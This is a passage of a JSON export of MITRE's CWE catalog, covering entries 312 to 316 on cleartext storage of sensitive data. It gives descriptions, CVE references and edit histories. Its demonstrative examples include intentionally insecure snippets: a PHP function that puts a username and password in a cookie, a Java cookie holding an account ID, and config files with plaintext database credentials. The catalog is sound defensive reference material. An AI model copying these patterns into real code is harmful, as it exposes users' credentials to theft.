Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, Modes_of_Introduction, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations, Relationships"}],"Previous_Entry_Name":[{"#text":"Failure to Encrypt Data","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Encrypt Sensitive Data","attr":{"@_Date":"2010-02-16"}}]}},"312":{"attr":{"@_ID":"312","@_Name":"Cleartext Storage of Sensitive Information","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application stores sensitive information in cleartext within a resource that might be accessible to another control sphere.","Extended_Description":"Because the information is stored in cleartext, attackers could potentially read it. Even if the information is encoded in a way that is not human-readable, certain techniques could determine which encoding is being used, then decode the information.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"311","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"311","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"922","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"An attacker with access to the system could read sensitive information stored in cleartext."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-44"},"Intro_Text":"The following code excerpt stores a plaintext user account ID in a browser cookie.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":"response.addCookie( new Cookie(\\"userAccountID\\", acctID);"},"Body_Text":"Because the account ID is in plaintext, the user\'s account information is exposed if their computer is compromised by an attacker."},{"attr":{"@_Demonstrative_Example_ID":"DX-40"},"Intro_Text":"This code writes a user\'s login information to a cookie so the user does not have to login again later.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function persistLogin($username, $password){}","xhtml:div":{"#text":"$data = array(\\"username\\" =&gt; $username, \\"password\\"=&gt; $password);setcookie (\\"userdata\\", $data);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},"Body_Text":["The code stores the user\'s username and password in plaintext in a cookie on the user\'s machine. This exposes the user\'s login information if their computer is compromised by an attacker. Even if the user\'s machine is not compromised, this weakness combined with cross-site scripting (CWE-79) could allow an attacker to remotely copy the cookie.","Also note this example code also exhibits Plaintext Storage in a Cookie (CWE-315)."]},{"attr":{"@_Demonstrative_Example_ID":"DX-41"},"Intro_Text":"The following code attempts to establish a connection, read in a password, then store it to a buffer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"server.sin_family = AF_INET; hp = gethostbyname(argv[1]);if (hp==NULL) error(\\"Unknown host\\");memcpy( (char *)&amp;server.sin_addr,(char *)hp-&gt;h_addr,hp-&gt;h_length);if (argc &lt; 3) port = 80;else port = (unsigned short)atoi(argv[3]);server.sin_port = htons(port);if (connect(sock, (struct sockaddr *)&amp;server, sizeof server) &lt; 0) error(\\"Connecting\\");...while ((n=read(sock,buffer,BUFSIZE-1))!=-1) {","xhtml:br":["","","","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"write(dfd,password_buffer,n);...","xhtml:br":["","",""]}}}},"Body_Text":"While successful, the program does not encrypt the data before writing it to a buffer, possibly exposing it to unauthorized actors."},{"attr":{"@_Demonstrative_Example_ID":"DX-43"},"Intro_Text":"The following examples show a portion of properties and configuration files for Java and ASP.NET applications. The files include username and password information but they are stored in cleartext.","Body_Text":["This Java example shows a properties file with a cleartext username / password pair.","The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database but the pair is stored in cleartext.","Username and password information should not be included in a configuration file or a properties file in cleartext as this will allow anyone who can read the file access to the resource. If possible, encrypt this information."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...webapp.ldap.username=secretUsernamewebapp.ldap.password=secretPassword...","xhtml:br":["","","","",""],"xhtml:i":"# Java Web App ResourceBundle properties file"}},{"attr":{"@_Nature":"bad","@_Language":"ASP.NET"},"xhtml:div":{"#text":"...&lt;connectionStrings&gt;&lt;/connectionStrings&gt;...","xhtml:br":["",""],"xhtml:div":{"#text":"&lt;add name=\\"ud_DEV\\" connectionString=\\"connectDB=uDB; uid=db2admin; pwd=password; dbalias=uDB;\\" providerName=\\"System.Data.Odbc\\" /&gt;","attr":{"@_style":"margin-left:10px;"}}}}]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-2272","Description":"password and username stored in cleartext in a cookie","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2272"},{"Reference":"CVE-2009-1466","Description":"password stored in cleartext in a file with insecure permissions","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1466"},{"Reference":"CVE-2009-0152","Description":"chat program disables SSL in some circumstances even when the user says to use SSL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0152"},{"Reference":"CVE-2009-1603","Description":"Chain: product uses an incorrect public exponent when generating an RSA key, which effectively disables the encryption","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1603"},{"Reference":"CVE-2009-0964","Description":"storage of unencrypted passwords in a database","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0964"},{"Reference":"CVE-2008-6157","Description":"storage of unencrypted passwords in a database","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6157"},{"Reference":"CVE-2008-6828","Description":"product stores a password in cleartext in memory","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6828"},{"Reference":"CVE-2008-1567","Description":"storage of a secret key in cleartext in a temporary file","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1567"},{"Reference":"CVE-2008-0174","Description":"SCADA product uses HTTP Basic Authentication, which is not encrypted","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0174"},{"Reference":"CVE-2007-5778","Description":"login credentials stored unencrypted in a registry key","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5778"},{"Reference":"CVE-2001-1481","Description":"Plaintext credentials in world-readable file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1481"},{"Reference":"CVE-2005-1828","Description":"Password in cleartext in config file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1828"},{"Reference":"CVE-2005-2209","Description":"Password in cleartext in config file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2209"},{"Reference":"CVE-2002-1696","Description":"Decrypted copy of a message written to disk given a combination of options and when user replies to an encrypted message.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1696"},{"Reference":"CVE-2004-2397","Description":"Plaintext storage of private key and passphrase in log file when user imports the key.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2397"},{"Reference":"CVE-2002-1800","Description":"Admin password in plaintext in a cookie.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1800"},{"Reference":"CVE-2001-1537","Description":"Default configuration has cleartext usernames/passwords in cookie.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1537"},{"Reference":"CVE-2001-1536","Description":"Usernames/passwords in cleartext in cookies.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1536"},{"Reference":"CVE-2005-2160","Description":"Authentication information stored in cleartext in a cookie.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2160"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Plaintext Storage of Sensitive Information"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"37"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 9, &#34;Protecting Secret Data&#34; Page 299"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 2, &#34;Common Vulnerabilities of Encryption&#34;, Page 43"}},{"attr":{"@_External_Reference_ID":"REF-172"}}]},"Notes":{"Note":{"#text":"Different people use \\"cleartext\\" and \\"plaintext\\" to mean the same thing: the lack of encryption. However, within cryptography, these have more precise meanings. Plaintext is the information just before it is fed into a cryptographic algorithm, including already-encrypted text. Cleartext is any information that is unencrypted, although it might be in an encoded form that is not easily human-readable (such as base64 encoding).","attr":{"@_Type":"Terminology"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Observed_Examples, References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Applicable_Platforms, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Description, Relationships, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-01-23","Modification_Comment":"updated Abstraction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":{"#text":"Plaintext Storage of Sensitive Information","attr":{"@_Date":"2009-01-12"}}}},"313":{"attr":{"@_ID":"313","@_Name":"Cleartext Storage in a File or on Disk","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application stores sensitive information in cleartext in a file, or on disk.","Extended_Description":"The sensitive information could be read by attackers with access to the file, or with physical or administrator access to the raw disk. Even if the information is encoded in a way that is not human-readable, certain techniques could determine which encoding is being used, then decode the information.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"312","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-43"},"Intro_Text":"The following examples show a portion of properties and configuration files for Java and ASP.NET applications. The files include username and password information but they are stored in cleartext.","Body_Text":["This Java example shows a properties file with a cleartext username / password pair.","The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database but the pair is stored in cleartext.","Username and password information should not be included in a configuration file or a properties file in cleartext as this will allow anyone who can read the file access to the resource. If possible, encrypt this information."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...webapp.ldap.username=secretUsernamewebapp.ldap.password=secretPassword...","xhtml:br":["","","","",""],"xhtml:i":"# Java Web App ResourceBundle properties file"}},{"attr":{"@_Nature":"bad","@_Language":"ASP.NET"},"xhtml:div":{"#text":"...&lt;connectionStrings&gt;&lt;/connectionStrings&gt;...","xhtml:br":["",""],"xhtml:div":{"#text":"&lt;add name=\\"ud_DEV\\" connectionString=\\"connectDB=uDB; uid=db2admin; pwd=password; dbalias=uDB;\\" providerName=\\"System.Data.Odbc\\" /&gt;","attr":{"@_style":"margin-left:10px;"}}}}]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-1481","Description":"Cleartext credentials in world-readable file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1481"},{"Reference":"CVE-2005-1828","Description":"Password in cleartext in config file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1828"},{"Reference":"CVE-2005-2209","Description":"Password in cleartext in config file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2209"},{"Reference":"CVE-2002-1696","Description":"Decrypted copy of a message written to disk given a combination of options and when user replies to an encrypted message.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1696"},{"Reference":"CVE-2004-2397","Description":"Cleartext storage of private key and passphrase in log file when user imports the key.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2397"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Plaintext Storage in File or on Disk"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"Notes":{"Note":{"#text":"Different people use \\"cleartext\\" and \\"plaintext\\" to mean the same thing: the lack of encryption. However, within cryptography, these have more precise meanings. Plaintext is the information just before it is fed into a cryptographic algorithm, including already-encrypted text. Cleartext is any information that is unencrypted, although it might be in an encoded form that is not easily human-readable (such as base64 encoding).","attr":{"@_Type":"Terminology"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Name, Observed_Examples, Potential_Mitigations, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":[{"#text":"Plaintext Storage in File or on Disk","attr":{"@_Date":"2008-04-11"}},{"#text":"Plaintext Storage in a File or on Disk","attr":{"@_Date":"2013-07-17"}}]}},"314":{"attr":{"@_ID":"314","@_Name":"Cleartext Storage in the Registry","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application stores sensitive information in cleartext in the registry.","Extended_Description":"Attackers can read the information by accessing the registry key. Even if the information is encoded in a way that is not human-readable, certain techniques could determine which encoding is being used, then decode the information.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"312","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2005-2227","Description":"Cleartext passwords in registry key.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2227"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Plaintext Storage in Registry"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"37"}}},"Notes":{"Note":{"#text":"Different people use \\"cleartext\\" and \\"plaintext\\" to mean the same thing: the lack of encryption. However, within cryptography, these have more precise meanings. Plaintext is the information just before it is fed into a cryptographic algorithm, including already-encrypted text. Cleartext is any information that is unencrypted, although it might be in an encoded form that is not easily human-readable (such as base64 encoding).","attr":{"@_Type":"Terminology"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Applicable_Platforms, Description, Name, Observed_Examples, Potential_Mitigations, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Plaintext Storage in Registry","attr":{"@_Date":"2008-04-11"}},{"#text":"Plaintext Storage in the Registry","attr":{"@_Date":"2013-07-17"}}]}},"315":{"attr":{"@_ID":"315","@_Name":"Cleartext Storage of Sensitive Information in a Cookie","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application stores sensitive information in cleartext in a cookie.","Extended_Description":"Attackers can use widely-available tools to view the cookie and read the sensitive information. Even if the information is encoded in a way that is not human-readable, certain techniques could determine which encoding is being used, then decode the information.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"312","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-44"},"Intro_Text":"The following code excerpt stores a plaintext user account ID in a browser cookie.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":"response.addCookie( new Cookie(\\"userAccountID\\", acctID);"},"Body_Text":"Because the account ID is in plaintext, the user\'s account information is exposed if their computer is compromised by an attacker."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1800","Description":"Admin password in cleartext in a cookie.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1800"},{"Reference":"CVE-2001-1537","Description":"Default configuration has cleartext usernames/passwords in cookie.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1537"},{"Reference":"CVE-2001-1536","Description":"Usernames/passwords in cleartext in cookies.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1536"},{"Reference":"CVE-2005-2160","Description":"Authentication information stored in cleartext in a cookie.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2160"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Plaintext Storage in Cookie"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"31"}},{"attr":{"@_CAPEC_ID":"37"}},{"attr":{"@_CAPEC_ID":"39"}},{"attr":{"@_CAPEC_ID":"74"}}]},"Notes":{"Note":{"#text":"Different people use \\"cleartext\\" and \\"plaintext\\" to mean the same thing: the lack of encryption. However, within cryptography, these have more precise meanings. Plaintext is the information just before it is fed into a cryptographic algorithm, including already-encrypted text. Cleartext is any information that is unencrypted, although it might be in an encoded form that is not easily human-readable (such as base64 encoding).","attr":{"@_Type":"Terminology"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Name, Observed_Examples, Potential_Mitigations, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Plaintext Storage in Cookie","attr":{"@_Date":"2008-04-11"}},{"#text":"Plaintext Storage in a Cookie","attr":{"@_Date":"2013-07-17"}}]}},"316":{"attr":{"@_ID":"316","@_Name":"Cleartext Storage of Sensitive Information in Memory","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application stores sensitive information in cleartext in memory.","Extended_Description":{"xhtml:p":["The sensitive memory might be saved to disk, stored in a core dump, or remain uncleared if the application crashes, or if the programmer does not properly clear the memory before freeing it.","It could be argued that such problems are usually only exploitable by those with administrator privileges. However, swapping could cause the memory to be written to disk and leave it accessible to physical attack afterwards. Core dump files might have insecure permissions or be stored in archive files that are accessible to untrusted people. Or, uncleared sensitive memory might be inadvertently exposed to attackers due to another weakness."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"312","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Memory"}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-1517","Description":"Sensitive authentication information in cleartext in memory.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1517"},{"Reference":"BID:10155","Description":"Sensitive authentication information in cleartext in memory.","Link":"http://www.securityfocus.com/bid/10155"},{"Reference":"CVE-2001-0984","Description":"Password protector leaves passwords in memory when window is minimized, even when \\"clear password when minimized\\" is set.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0984"},{"Reference":"CVE-2003-0291","Description":"SSH client does not clear credentials from memory.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0291"}]},"Affected_Resources":{"Affected_Resource":"Memory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Plaintext Storage in Memory"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"Notes":{"Note":[{"#text":"This could be a resultant weakness, e.g. if the compiler removes code that was intended to wipe memory.","attr":{"@_Type":"Relationship"}},{"#text":"Different people use \\"cleartext\\" and \\"plaintext\\" to mean the same thing: the lack of encryption. However, within cryptography, these have more precise meanings. Plaintext is the information just before it is fed into a cryptographic algorithm, including already-encrypted text. Cleartext is any information that is unencrypted, although it might be in an encoded form that is not easily human-readable (such as base64 encoding).","attr":{"@_Type":"Terminology"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Applicable_Platforms, Description, Name, Other_Notes, Potential_Mitigations, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content 